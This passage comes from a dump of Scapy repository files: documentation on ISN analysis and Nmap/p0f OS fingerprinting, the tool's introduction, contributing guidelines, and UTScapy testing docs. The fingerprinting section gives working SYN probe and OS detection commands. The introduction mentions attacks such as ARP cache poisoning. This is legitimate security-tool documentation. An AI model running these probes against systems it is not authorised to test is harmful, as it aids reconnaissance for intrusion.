Fingerprinting\n-----------------\n\nISN\n^^^\n\nScapy can be used to analyze ISN (Initial Sequence Number) increments to possibly discover vulnerable systems. First we will collect target responses by sending a number of SYN probes in a loop::\n\n >>> ans, unans = srloop(IP(dst=\"192.168.1.1\")/TCP(dport=80,flags=\"S\"))\n\nOnce we obtain a reasonable number of responses we can start analyzing collected data with something like this:\n\n >>> temp = 0\n >>> for s, r in ans:\n ... temp = r[TCP].seq - temp\n ... print(\"%d\\t+%d\" % (r[TCP].seq, temp))\n ... \n 4278709328 +4275758673\n 4279655607 +3896934\n 4280642461 +4276745527\n 4281648240 +4902713\n 4282645099 +4277742386\n 4283643696 +5901310\n\nnmap_fp\n^^^^^^^\n\nNmap fingerprinting (the old \"1st generation\" one that was done by Nmap up to v4.20) is supported in Scapy. In Scapy v2 you have to load an extension module first::\n\n >>> load_module(\"nmap\")\n\nIf you have Nmap installed you can use it's active os fingerprinting database with Scapy. Make sure that version 1 of signature database is located in the path specified by::\n\n >>> conf.nmap_base\n\nThen you can use the ``nmap_fp()`` function which implements same probes as in Nmap's OS Detection engine::\n\n >>> nmap_fp(\"192.168.1.1\",oport=443,cport=1)\n Begin emission:\n .****..**Finished to send 8 packets.\n *................................................\n Received 58 packets, got 7 answers, remaining 1 packets\n (1.0, ['Linux 2.4.0 - 2.5.20', 'Linux 2.4.19 w/grsecurity patch', \n 'Linux 2.4.20 - 2.4.22 w/grsecurity.org patch', 'Linux 2.4.22-ck2 (x86)\n w/grsecurity.org and HZ=1000 patches', 'Linux 2.4.7 - 2.6.11'])\n\np0f\n^^^\n\nIf you have p0f installed on your system, you can use it to guess OS name and version right from Scapy (only SYN database is used). 
First make sure that p0f database exists in the path specified by::\n\n >>> conf.p0f_base\n\nFor example to guess OS from a single captured packet:\n\n >>> sniff(prn=prnp0f)\n 192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs)\n -> 74.125.19.104:www (distance 0)\n <Sniffed: TCP:339 UDP:2 ICMP:0 Other:156>\n\n\n\n" }, { "alpha_fraction": 0.7180855870246887, "alphanum_fraction": 0.7307518124580383, "avg_line_length": 51.85646057128906, "blob_id": "c365f6dab4e112eb23bf1daa3be930c496570e25", "content_id": "20b64379fd80088e25c245c53657f6766e7c2a6f", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 11059, "license_type": "permissive", "max_line_length": 646, "num_lines": 209, "path": "/scapy/doc/scapy/introduction.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "************\nIntroduction\n************\n\n.. sectionauthor:: Philippe Biondi <phil at secdev.org>\n\nAbout Scapy\n===========\nScapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.\n\nIn other words, Scapy is a powerful interactive packet manipulation program. \nIt is able to forge or decode packets of a wide number of protocols,\nsend them on the wire, capture them, match requests and replies, and \nmuch more. Scapy can easily handle most classical tasks like scanning,\ntracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark). \n\n.. image:: graphics/testing-taxonomy.*\n :scale: 50\n \nScapy also performs very well on a lot of other\nspecific tasks that most other tools can't handle, like sending invalid frames,\ninjecting your own 802.11 frames, combining techniques \n(VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. \n\nThe idea is simple. Scapy mainly does two things: sending packets and receiving answers. You define a set of packets, it sends them, receives answers, matches requests with answers and returns a list of packet couples (request, answer) and a list of unmatched packets. This has the big advantage over tools like Nmap or hping that an answer is not reduced to (open/closed/filtered), but is the whole packet.\n\nOn top of this can be build more high level functions, for example, one that does traceroutes and give as a result only the start TTL of the request and the source IP of the answer. One that pings a whole network and gives the list of machines answering. One that does a portscan and returns a LaTeX report.\n\n\nWhat makes Scapy so special\n===========================\n\nFirst, with most other networking tools, you won't build something the author did not imagine. These tools have been built for a specific goal and can't deviate much from it. For example, an ARP cache poisoning program won't let you use double 802.1q encapsulation. Or try to find a program that can send, say, an ICMP packet with padding (I said *padding*, not *payload*, see?). In fact, each time you have a new need, you have to build a new tool.\n\nSecond, they usually confuse decoding and interpreting. Machines are good at decoding and can help human beings with that. Interpretation is reserved for human beings. Some programs try to mimic this behavior. 
For instance they say \"*this port is open*\" instead of \"*I received a SYN-ACK*\". Sometimes they are right. Sometimes not. It's easier for beginners, but when you know what you're doing, you keep on trying to deduce what really happened from the program's interpretation to make your own, which is hard because you lost a big amount of information. And you often end up using ``tcpdump -xX`` to decode and interpret what the tool missed.\n\nThird, even programs which only decode do not give you all the information they received. The network's vision they give you is the one their author thought was sufficient. But it is not complete, and you have a bias. For instance, do you know a tool that reports the Ethernet padding?\n\nScapy tries to overcome those problems. It enables you to build exactly the packets you want. Even if I think stacking a 802.1q layer on top of TCP has no sense, it may have some for somebody else working on some product I don't know. Scapy has a flexible model that tries to avoid such arbitrary limits. You're free to put any value you want in any field you want and stack them like you want. You're an adult after all.\n\nIn fact, it's like building a new tool each time, but instead of dealing with a hundred line C program, you only write 2 lines of Scapy.\n\nAfter a probe (scan, traceroute, etc.) Scapy always gives you the full decoded packets from the probe, before any interpretation. That means that you can probe once and interpret many times, ask for a traceroute and look at the padding for instance.\n\nFast packet design\n------------------\n\nOther tools stick to the **program-that-you-run-from-a-shell** paradigm.\nThe result is an awful syntax to describe a packet. For these tools, the \nsolution adopted uses a higher but less powerful description, in the form of \nscenarios imagined by the tool's author. As an example, only the IP address must \nbe given to a port scanner to trigger the **port scanning** scenario. Even\nif the scenario is tweaked a bit, you still are stuck to a port scan.\n\nScapy's paradigm is to propose a Domain Specific Language (DSL) that \nenables a powerful and fast description of any kind of packet. Using the Python \nsyntax and a Python interpreter as the DSL syntax and interpreter has many \nadvantages: there is no need to write a separate interpreter, users don't need \nto learn yet another language and they benefit from a complete, concise \nand very powerful language.\n\nScapy enables the user to describe a packet or set of packets as layers that are\nstacked one upon another. Fields of each layer have useful default values that \ncan be overloaded. Scapy does not oblige the user to use predetermined methods \nor templates. This alleviates the requirement of writing a new tool each time a \ndifferent scenario is required. In C, it may take an average of 60 lines to \ndescribe a packet. With Scapy, the packets to be sent may be described in only a\nsingle line with another line to print the result. 90\\% of the network probing \ntools can be rewritten in 2 lines of Scapy.\n\nProbe once, interpret many\n--------------------------\n\nNetwork discovery is blackbox testing. When probing a network, many stimuli are \nsent while only a few of them are answered. If the right stimuli are \nchosen, the desired information may be obtained by the responses or the lack of \nresponses. Unlike many tools, Scapy gives all the information, i.e. all the \nstimuli sent and all the responses received. 
Examination of this data will give \nthe user the desired information. When the dataset is small, the user can just \ndig for it. In other cases, the interpretation of the data will depend on the \npoint of view taken. Most tools choose the viewpoint and discard all the data \nnot related to that point of view. Because Scapy gives the complete raw data, \nthat data may be used many times allowing the viewpoint to evolve during \nanalysis. For example, a TCP port scan may be probed and the data visualized as \nthe result of the port scan. The data could then also be visualized with respect\nto the TTL of response packet. A new probe need not be initiated to adjust the \nviewpoint of the data.\n\n.. image:: graphics/scapy-concept.*\n :scale: 80\n\nScapy decodes, it does not interpret\n------------------------------------\n\nA common problem with network probing tools is they try to interpret the answers\nreceived instead of only decoding and giving facts. Reporting something like \n**Received a TCP Reset on port 80** is not subject to interpretation errors. \nReporting **Port 80 is closed** is an interpretation that may be right most \nof the time but wrong in some specific contexts the tool's author did not \nimagine. For instance, some scanners tend to report a filtered TCP port when \nthey receive an ICMP destination unreachable packet. This may be right, but in \nsome cases, it means the packet was not filtered by the firewall but rather there\nwas no host to forward the packet to.\n\nInterpreting results can help users that don't know what a port scan is but \nit can also make more harm than good, as it injects bias into the results. What \ncan tend to happen is that so that they can do the interpretation themselves, \nknowledgeable users will try to reverse engineer the tool's interpretation to \nderive the facts that triggered that interpretation. Unfortunately, much \ninformation is lost in this operation.\n\n\n\n\nQuick demo\n==========\n\nFirst, we play a bit and create four IP packets at once. Let's see how it works. We first instantiate the IP class. Then, we instantiate it again and we provide a destination that is worth four IP addresses (/30 gives the netmask). Using a Python idiom, we develop this implicit packet in a set of explicit packets. Then, we quit the interpreter. 
As we provided a session file, the variables we were working on are saved, then reloaded:: \n\n # ./run_scapy -s mysession\n New session [mysession]\n Welcome to Scapy (2.4.0)\n >>> IP()\n <IP |>\n >>> target=\"www.target.com/30\"\n >>> ip=IP(dst=target)\n >>> ip\n <IP dst=<Net www.target.com/30> |>\n >>> [p for p in ip]\n [<IP dst=207.171.175.28 |>, <IP dst=207.171.175.29 |>, \n <IP dst=207.171.175.30 |>, <IP dst=207.171.175.31 |>]\n >>> ^D\n \n::\n \n # ./run_scapy -s mysession\n Using session [mysession]\n Welcome to Scapy (2.4.0)\n >>> ip\n <IP dst=<Net www.target.com/30> |>\n\nNow, let's manipulate some packets::\n\n >>> IP()\n <IP |>\n >>> a=IP(dst=\"172.16.1.40\")\n >>> a\n <IP dst=172.16.1.40 |>\n >>> a.dst\n '172.16.1.40'\n >>> a.ttl\n 64\n \nLet's say I want a broadcast MAC address, and IP payload to ketchup.com \nand to mayo.com, TTL value from 1 to 9, and an UDP payload::\n \n >>> Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n /IP(dst=[\"ketchup.com\",\"mayo.com\"],ttl=(1,9)) \n /UDP() \n\nWe have 18 packets defined in 1 line (1 implicit packet) \n\nSensible default values\n-----------------------\n\nScapy tries to use sensible default values for all packet fields.\nIf not overridden,\n\n* IP source is chosen according to destination and routing table \n* Checksum is computed \n* Source MAC is chosen according to the output interface \n* Ethernet type and IP protocol are determined by the upper layer \n\n.. image:: graphics/default-values-ip.png\n :scale: 60\n\nOther fields’ default values are chosen to be the most useful ones: \n\n* TCP source port is 20, destination port is 80. \n* UDP source and destination ports are 53. \n* ICMP type is echo request. \n\n\nLearning Python\n===============\n\nScapy uses the Python interpreter as a command board. That means that you can directly use the Python language (assign variables, use loops, define functions, etc.)\n\nIf you are new to Python and you really don't understand a word because of that, or if you want to learn this language, take an hour to read the very good `Python tutorial <http://docs.python.org/tutorial/>`_ by Guido Van Rossum. After that, you'll know Python :) (really!). For a more in-depth tutorial `Dive Into Python <http://diveintopython.org/>`_ is a very good start too.\n\nFor a quick start, here's an overview of Python's data types:\n\n* ``int`` (signed, 32bits) : ``42`` \n* ``long`` (signed, infinite): ``42L`` \n* ``str`` : ``\"bell\\x07\\n\"`` or ``’bell\\x07\\n’`` \n\n* ``tuple`` (immutable): ``(1,4,\"42\")`` \n* ``list`` (mutable): ``[4,2,\"1\"]`` \n* ``dict`` (mutable): ``{ \"one\":1 , \"two\":2 }``\n\nThere are no block delimiters in Python. Instead, indentation does matter::\n\n if cond:\n instr\n instr\n elif cond2:\n instr\n else:\n instr\n \n\n" }, { "alpha_fraction": 0.7367088794708252, "alphanum_fraction": 0.7417721748352051, "avg_line_length": 40.578948974609375, "blob_id": "cd5fff8451dd25be0638a6b1d95346bb22931d83", "content_id": "87e44944aba5c88af4689d247cf9ba917a76e0b9", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 790, "license_type": "permissive", "max_line_length": 143, "num_lines": 19, "path": "/scapy/.github/PULL_REQUEST_TEMPLATE.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "This is just a checklist to guide you. 
You can remove it safely.\n\n\n[ ] If you are new to Scapy: I have checked https://github.com/secdev/scapy/blob/master/CONTRIBUTING.md (esp. section submitting-pull-requests)\n\n[ ] I squashed commits belonging together\n\n[ ] I added unit tests or explained why they are not relevant\n\n[ ] I executed the regression tests for Python2 and Python3 (using `tox` or, `cd test && ./run_tests_py2, cd test && ./run_tests_py3`)\n\n\n< brief description what this PR will do, e.g. fixes broken dissection of XXX >\n\n< if required - short explanation why you fixed something in a way that may look more complicated as it actually is >\n\n< if required - outline impacts on other parts of the library >\n\nfixes #< add issue number here if appropriate, else remove this line>\n" }, { "alpha_fraction": 0.6187845468521118, "alphanum_fraction": 0.6243094205856323, "avg_line_length": 21.625, "blob_id": "23b827e41de4f8531c077ec9dd946d01a6330216", "content_id": "ed3c1eeba166ca59d6d1f3e0025cd78a7e1340d1", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 362, "license_type": "permissive", "max_line_length": 35, "num_lines": 16, "path": "/scapy/.coveragerc", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "[run]\nomit =\n # Travis specific path\n /home/travis/virtualenv/python*\n # Python specific path\n /usr/local/lib/python2.7/*\n # Scapy specific paths & files\n test/*\n bin/*\n scapy/tools/*\n */travis_test_client.py\n */travis_test_server.py\n */tools/UTscapy.py\n # Libraries\n */scapy/modules/six.py\n */scapy/modules/winpcapy.py\n" }, { "alpha_fraction": 0.7532950043678284, "alphanum_fraction": 0.7566745281219482, "avg_line_length": 39.53424835205078, "blob_id": "fbe88dc804566b143f4f69a692512574e191585d", "content_id": "85eb715ffdef68ba8034d363764c9602b662f6ef", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5918, "license_type": "permissive", "max_line_length": 179, "num_lines": 146, "path": "/scapy/CONTRIBUTING.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# How to contribute\n\nContributors are essential to Scapy (as they are to most open source\nprojects). Here is some advice to help you help the project!\n\n## Project objectives\n\nWe try to keep Scapy as powerful as possible, to support as many\nprotocols and platforms as possible, to keep and make the code (and\nthe commit history) as clean as possible.\n\nSince Scapy can be slow and memory consuming, we try to limit CPU and\nmemory usage, particularly in parts of the code often called.\n\n## What to contribute?\n\nYou want to spend time working on Scapy but have no (or little)\nidea what to do? You can look for open issues\n[labeled \"contributions wanted\"](https://github.com/secdev/scapy/labels/contributions%20wanted), or look at the [contributions roadmap](https://github.com/secdev/scapy/issues/399)\n\nIf you have any ideas of useful contributions that you cannot (or do\nnot want to) do yourself, open an issue and use the label\n\"contributions wanted\".\n\nOnce you have chosen a contribution, open an issue to let other people\nknow you're working on it (or assign the existing issue to yourself)\nand track your progress. 
You might want to ask whether you're working\nin an appropriate direction, to avoid the frustration of seeing your\ncontribution rejected after a lot of work.\n\n## Reporting issues\n\n### Questions\n\nIt is OK so submit issues to ask questions (more than OK,\nencouraged). There is a label \"question\" that you can use for that.\n\n### Bugs\n\nIf you have installed Scapy through a package manager (from your Linux\nor BSD system, from PyPI, etc.), please get and install the current\ndevelopment code, and check that the bug still exists before\nsubmitting an issue.\n\nPlease label your issues \"bug\".\n\nIf you're not sure whether a behavior is a bug or not, submit an issue\nand ask, don't be shy!\n\n### Enhancements / feature requests\n\nIf you want a feature in Scapy, but cannot implement it yourself or\nwant some hints on how to do that, open an issue with label\n\"enhancement\".\n\nExplain if possible the API you would like to have (e.g., give examples\nof function calls, packet creations, etc.).\n\n## Submitting pull requests\n\n### Coding style & conventions\n\nFirst, Scapy \"legacy\" code contains a lot of code that do not comply\nwith the following recommendations, but we try to comply with some\nguidelines for new code.\n\n - The code should be PEP-8 compliant; you can check your code with\n [pep8](https://pypi.python.org/pypi/pep8).\n - [Pylint](http://www.pylint.org/) can help you write good Python\n code (even if respecting Pylint rules is sometimes either too hard\n or even undesirable; human brain needed!).\n - [Google Python Style Guide](https://google.github.io/styleguide/pyguide.html)\n is a nice read!\n - Avoid creating unnecessary `list` objects, particularly if they\n can be huge (e.g., when possible, use `scapy.modules.six.range()` instead of\n `range()`, `for line in fdesc` instead of `for line in\n fdesc.readlines()`; more generally prefer generators over lists).\n\n### Tests\n\nPlease consider adding tests for your new features or that trigger the\nbug you are fixing. This will prevent a regression from being\nunnoticed. Do not use the variable `_` in your tests, as it could break them.\n\nIf you find yourself in a situation where your tests locally succeed but \nfail if executed on the CI, try to enable the debuging option for the \ndissector by setting `conf.debug_dissector = 1`.\n\n### New protocols\n\nNew protocols can go either in `scapy/layers` or to\n`scapy/contrib`. Protocols in `scapy/layers` should be usually found\non common networks, while protocols in `scapy/contrib` should be\nuncommon or specific.\n\n### Features\n\nProtocol-related features should be implemented within the same module\nas the protocol layers(s) (e.g., `traceroute()` is implemented in\n`scapy/layers/inet.py`).\n\nOther features may be implemented in a module (`scapy/modules`) or a\ncontribution (`scapy/contrib`).\n\n### Core\n\nIf you contribute to Scapy's core (e.g., `scapy/base_classes.py`,\n`scapy/packet.py`, etc.), please be very careful with performances and\nmemory footprint, as it is easy to write Python code that wastes\nmemory or CPU cycles.\n\nAs an example, Packet().__init__() is called each time a **layer** is\nparsed from a string (during a network capture or a PCAP file\nread). Adding inefficient code here will have a disastrous effect on\nScapy's performances.\n\n### Python 2 and 3 compatibility\n\nThe project aims to provide code that works both on Python 2 and Python 3. 
Therefore, some rules need to be applied to achieve compatibility:\n- byte-string must be defined as `b\"\\x00\\x01\\x02\"`\n- exceptions must comply with the new Python 3 format: `except SomeError as e:`\n- lambdas must be written using a single argument when using tuples: use `lambda x, y: x + f(y)` instead of `lambda (x, y): x + f(y)`.\n- use int instead of long\n- use list comprehension instead of map() and filter()\n- use scapy.modules.six.range instead of xrange and range\n- use scapy.modules.six.itervalues(dict) instead of dict.values() or dict.itervalues()\n- use scapy.modules.six.string_types instead of basestring\n- `__bool__ = __nonzero__` must be used when declaring `__nonzero__` methods\n- `io.BytesIO` must be used instead of `StringIO` when using bytes\n- `__cmp__` must not be used.\n- UserDict should be imported via `six.UserDict`\n\n### Code review\n\nMaintainers tend to be picky, and you might feel frustrated that your\ncode (which is perfectly working in your use case) is not merged\nfaster.\n\nPlease don't be offended, and keep in mind that maintainers are\nconcerned about code maintainability and readability, commit history\n(we use the history a lot, for example to find regressions or\nunderstand why certain decisions have been made), performances,\nintegration in Scapy, API consistency (so that someone who knows how\nto use Scapy will know how to use your code), etc.\n\n**Thanks for reading, happy hacking!**\n" }, { "alpha_fraction": 0.6511628031730652, "alphanum_fraction": 0.680232584476471, "avg_line_length": 23.428571701049805, "blob_id": "46683d64f4e47752948542b80bcc9cf3744393bd", "content_id": "1b5e2a931c9dd57492caac736d151419500654d4", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 172, "license_type": "permissive", "max_line_length": 50, "num_lines": 7, "path": "/scapy/test/tls/__init__.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "## This file is part of Scapy\n## Copyright (C) 2016 Maxence Tury <maxence.tury@ssi.gouv.fr>\n## This program is published under a GPLv2 license\n\n\"\"\"\nExamples and test PKI for the TLS module.\n\"\"\"\n\n" }, { "alpha_fraction": 0.6515411138534546, "alphanum_fraction": 0.6909246444702148, "avg_line_length": 33.35293960571289, "blob_id": "c22038e4ac24ee5636fdc31869607b726d82e4e5", "content_id": "5f222d947362ca8cf395e2e7d093fc5aadbcf853", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1168, "license_type": "permissive", "max_line_length": 105, "num_lines": 34, "path": "/scapy/doc/scapy/functions.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "***********************\nCalling Scapy functions\n***********************\n\nThis section provides some examples that show how to benefit from Scapy\nfunctions in your own code.\n\nUDP checksum\n============\n\nThe following example explains how to use the checksum() function to compute and\nUDP checksum manually. The following steps must be performed:\n\n1. compute the UDP pseudo header as described in RFC768\n2. build a UDP packet with Scapy with p[UDP].chksum=0\n3. 
call checksum() with the pseudo header and the UDP packet\n\n::\n\n from scapy.all import *\n\n # Get the UDP checksum computed by Scapy\n packet = IP(dst=\"10.11.12.13\", src=\"10.11.12.14\")/UDP()/DNS()\n packet = IP(raw(packet)) # Build packet (automatically done when sending)\n checksum_scapy = packet[UDP].chksum\n\n # Set the UDP checksum to 0 and compute the checksum 'manually'\n packet = IP(dst=\"10.11.12.13\", src=\"10.11.12.14\")/UDP(chksum=0)/DNS()\n packet_raw = raw(packet)\n udp_raw = packet_raw[20:]\n # in4_chksum is used to automatically build a pseudo-header\n chksum = in4_chksum(socket.IPPROTO_UDP, packet[IP], udp_raw) # For more infos, call \"help(in4_chksum)\"\n\n assert(checksum_scapy == chksum)\n" }, { "alpha_fraction": 0.6491255760192871, "alphanum_fraction": 0.6563866138458252, "avg_line_length": 51.49180221557617, "blob_id": "7dd4daddc3f9a996cdf3cd4c090ee0bef1305ba6", "content_id": "44a59b8d7318c002250f1937f08340075d5a1c15", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12874, "license_type": "permissive", "max_line_length": 883, "num_lines": 244, "path": "/scapy/doc/scapy/development.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "*****************\nScapy development\n*****************\n\nProject organization\n====================\n\nScapy development uses the Git version control system. Scapy's\nreference repository is at https://github.com/secdev/scapy/.\n\nProject management is done with `Github\n<https://github.com/secdev/scapy/>`_. It provides a freely editable\n`Wiki <https://github.com/secdev/scapy/wiki/>`_ (please contribute!)\nthat can reference tickets, changesets, files from the project. It\nalso provides a ticket management service that is used to avoid\nforgetting patches or bugs.\n\nHow to contribute\n=================\n\n* Found a bug in Scapy? `Add a ticket <https://github.com/secdev/scapy/issues/new>`_.\n* Improve this documentation.\n* Program a new layer and share it on the mailing list, or create a pull request.\n* Contribute new `regression tests <https://github.com/secdev/scapy/wiki/Contrib:-RegressionTests>`_.\n* Upload packet samples for new protocols on the `packet samples page\n <https://github.com/secdev/scapy/wiki/Contrib:-PacketSamples>`_.\n\n\nImprove the documentation\n=========================\n\nThe documentation can be improved in several ways by:\n\n* Adding docstrings to the source code.\n* Adding usage examples to the documentation.\n\nAdding Docstrings\n-----------------\nThe Scapy source code has few explanations of what a function is doing. 
A docstring, by adding explanation and\nexpected input and output parameters, helps saving time for both the layer developers and the users looking for\nadvanced features.\n\nAn example of docstring from the ``scapy.fields.FlagsField`` class: ::\n\n class FlagsField(BitField):\n \"\"\" Handle Flag type field\n\n Make sure all your flags have a label\n\n Example:\n >>> from scapy.packet import Packet\n >>> class FlagsTest(Packet):\n fields_desc = [FlagsField(\"flags\", 0, 8, [\"f0\", \"f1\", \"f2\", \"f3\", \"f4\", \"f5\", \"f6\", \"f7\"])]\n >>> FlagsTest(flags=9).show2()\n ###[ FlagsTest ]###\n flags = f0+f3\n >>> FlagsTest(flags=0).show2().strip()\n ###[ FlagsTest ]###\n flags =\n\n :param name: field's name\n :param default: default value for the field\n :param size: number of bits in the field\n :param names: (list or dict) label for each flag, Least Significant Bit tag's name is written first\n \"\"\"\n\nIt will contain a short one-line description of the class followed by some indications about its usage.\nYou can add a usage example if it makes sense using the `doctest <https://docs.python.org/2.7/library/doctest.html>`_ format.\nFinally, the classic python signature can be added following the `sphinx documentation <http://www.sphinx-doc.org/en/stable/domains.html#python-signatures>`_.\n\nThis task works in pair with writing non regression unit tests.\n\nDocumentation\n-------------\nA way to improve the documentation content is by keeping it up to date with the latest version of Scapy. You can also help by adding usage examples of your own or directly gathered from existing online Scapy presentations.\n\nTesting with UTScapy\n====================\n\nWhat is UTScapy?\n----------------\n\nUTScapy is a small Python program that reads a campaign of tests, runs the campaign with Scapy and generates a report indicating test status. The report may be in one of four formats, text, ansi, HTML or LaTeX.\n\nThree basic test containers exist with UTScapy, a unit test, a test set and a test campaign. A unit test is a list of Scapy commands that will be run by Scapy or a derived work of Scapy. Evaluation of the last command in the unit test will determine the end result of the individual unit test. A test set is a group of unit tests with some association. A test campaign consists of one or more test sets. Test sets and unit tests can be given keywords to form logical groupings. When running a campaign, tests may be selected by keyword. This allows the user to run tests within the desired grouping.\n\nFor each unit test, test set and campaign, a CRC32 of the test is calculated and displayed as a signature of that test. This test signature is sufficient to determine that the actual test run was the one expected and not one that has been modified. In case your dealing with evil people that try to modify or corrupt the file without changing the CRC32, a global SHA1 is computed on the whole file.\n\nSyntax of a Test Campaign\n-------------------------\n\nTable 1 shows the syntax indicators that UTScapy is looking for. The syntax specifier must appear as the first character of each line of the text file that defines the test. Text descriptions that follow the syntax specifier are arguments interpreted by UTScapy. Lines that appear without a leading syntax specifier will be treated as Python commands, provided they appear in the context of a unit test. Lines without a syntax specifier that appear outside the correct context will be rejected by UTScapy and a warning will be issued. 
\n\n================ =================\nSyntax Specifier Definition\n================ =================\n‘%’ Give the test campaign's name.\n‘+’ Announce a new test set.\n‘=’ Announce a new unit test.\n‘~’ Announce keywords for the current unit test.\n‘*’ Denotes a comment that will be included in the report.\n‘#’ Testcase annotations that are discarded by the interpreter.\n================ =================\n\nTable 1 - UTScapy Syntax Specifiers\n\nComments placed in the test report have a context. Each comment will be associated with the last defined test container - be it an individual unit test, a test set or a test campaign. Multiple comments associated with a particular container will be concatenated together and will appear in the report directly after the test container announcement. General comments for a test file should appear before announcing a test campaign. For comments to be associated with a test campaign, they must appear after the declaration of the test campaign but before any test set or unit test. Comments for a test set should appear before the definition of the set’s first unit test.\n\nThe generic format for a test campaign is shown in the following table::\n\n % Test Campaign Name\n * Comment describing this campaign\n\n \n + Test Set 1\n * comments for test set 1\n \n = Unit Test 1\n ~ keywords\n * Comments for unit test 1\n # Python statements follow\n a = 1\n print a\n a == 1\n\n\nPython statements are identified by the lack of a defined UTScapy syntax specifier. The Python statements are fed directly to the Python interpreter as if one is operating within the interactive Scapy shell (``interact``). Looping, iteration and conditionals are permissible but must be terminated by a blank line. A test set may be comprised of multiple unit tests and multiple test sets may be defined for each campaign. It is even possible to have multiple test campaigns in a particular test definition file. The use of keywords allows testing of subsets of the entire campaign. For example, during the development of a test campaign, the user may wish to mark new tests under development with the keyword “debug”. Once the tests run successfully to their desired conclusion, the keyword “debug” could be removed. Keywords such as “regression” or “limited” could be used as well.\n\nIt is important to note that UTScapy uses the truth value from the last Python statement as the indicator as to whether a test passed or failed. Multiple logical tests may appear on the last line. If the result is 0 or False, the test fails. Otherwise, the test passes. Use of an assert() statement can force evaluation of intermediate values if needed.\n\nThe syntax for UTScapy is shown in Table 3 - UTScapy command line syntax::\n\n [root@localhost scapy]# ./UTscapy.py –h\n Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX}] [-o output_file]\n [-t testfile] [-k keywords [-k ...]] [-K keywords [-K ...]]\n [-l] [-d|-D] [-F] [-q[q]]\n -l : generate local files\n -F : expand only failed tests\n -d : dump campaign\n -D : dump campaign and stop\n -C : don't calculate CRC and SHA\n -q : quiet mode\n -qq : [silent mode]\n -n <testnum> : only tests whose numbers are given (eg. 1,3-7,12)\n -m <module> : additional module to put in the namespace\n -k <kw1>,<kw2>,... : include only tests with one of those keywords (can be used many times)\n -K <kw1>,<kw2>,... : remove tests with one of those keywords (can be used many times)\n\nTable 3 - UTScapy command line syntax\n\nAll arguments are optional. 
Arguments that have no associated argument value may be strung together (i.e. ``–lqF``). If no testfile is specified, the test definition comes from <STDIN>. Similarly, if no output file is specified it is directed to <STDOUT>. The default output format is “ansi”. Table 4 lists the arguments, the associated argument value and their meaning to UTScapy.\n\n========== ============== =============================================================================\nArgument Argument Value Meaning to UTScapy\n========== ============== =============================================================================\n-t testfile Input test file defining test campaign (default = <STDIN>)\n-o output_file File for output of test campaign results (default = <STDOUT>)\n-f test ansi, HTML, LaTeX, Format out output report (default = ansi)\n-l Generate report associated files locally. For HTML, generates JavaScript \n and the style sheet\n-F Failed test cases will be initially expanded by default in HTML output\n-d Print a terse listing of the campaign before executing the campaign\n-D Print a terse listing of the campaign and stop. Do not execute campaign\n-C Do not calculate test signatures\n-q Do not update test progress to the screen as tests are executed\n-qq Silent mode\n-n testnum Execute only those tests listed by number. Test numbers may be\n retrieved using –d or –D. Tests may be listed as a comma\n separated list and may include ranges (e.g. 1, 3-7, 12)\n-m module Load module before executing tests. Useful in testing derived works of Scapy.\n Note: Derived works that are intended to execute as \"__main__\" will not be\n invoked by UTScapy as “__main__”.\n-k kw1, kw2, ... Include only tests with keyword “kw1”. Multiple keywords may be specified.\n-K kw1, kw2, ... Exclude tests with keyword “kw1”. Multiple keywords may be specified. \n========== ============== =============================================================================\n\nTable 4 - UTScapy parameters\n\nTable 5 shows a simple test campaign with multiple tests set definitions. Additionally, keywords are specified that allow a limited number of test cases to be executed. Notice the use of the ``assert()`` statement in test 3 and 5 used to check intermediate results. Tests 2 and 5 will fail by design.\n\n:: \n\n % Example Test Campaign\n \n # Comment describing this campaign\n #\n # To run this campaign, try:\n # ./UTscapy.py -t example_campaign.txt -f html -o example_campaign.html -F\n #\n \n * This comment is associated with the test campaign and will appear \n * in the produced output.\n \n + Test Set 1\n \n = Unit Test 1\n ~ test_set_1 simple\n a = 1\n print a\n \n = Unit test 2\n ~ test_set_1 simple\n * this test will fail\n b = 2\n a == b\n \n = Unit test 3\n ~ test_set_1 harder\n a = 1\n b = 2\n c = \"hello\"\n assert (a != b)\n c == \"hello\"\n \n + Test Set 2\n \n = Unit Test 4\n ~ test_set_2 harder\n b = 2\n d = b\n d is b\n \n = Unit Test 5\n ~ test_set_2 harder hardest\n a = 2\n b = 3\n d = 4\n e = (a * b)**d\n # The following statement evaluates to False but is not last; continue\n e == 6\n # assert evaluates to False; stop test and fail\n assert (e == 7)\n e == 1296\n \n = Unit Test 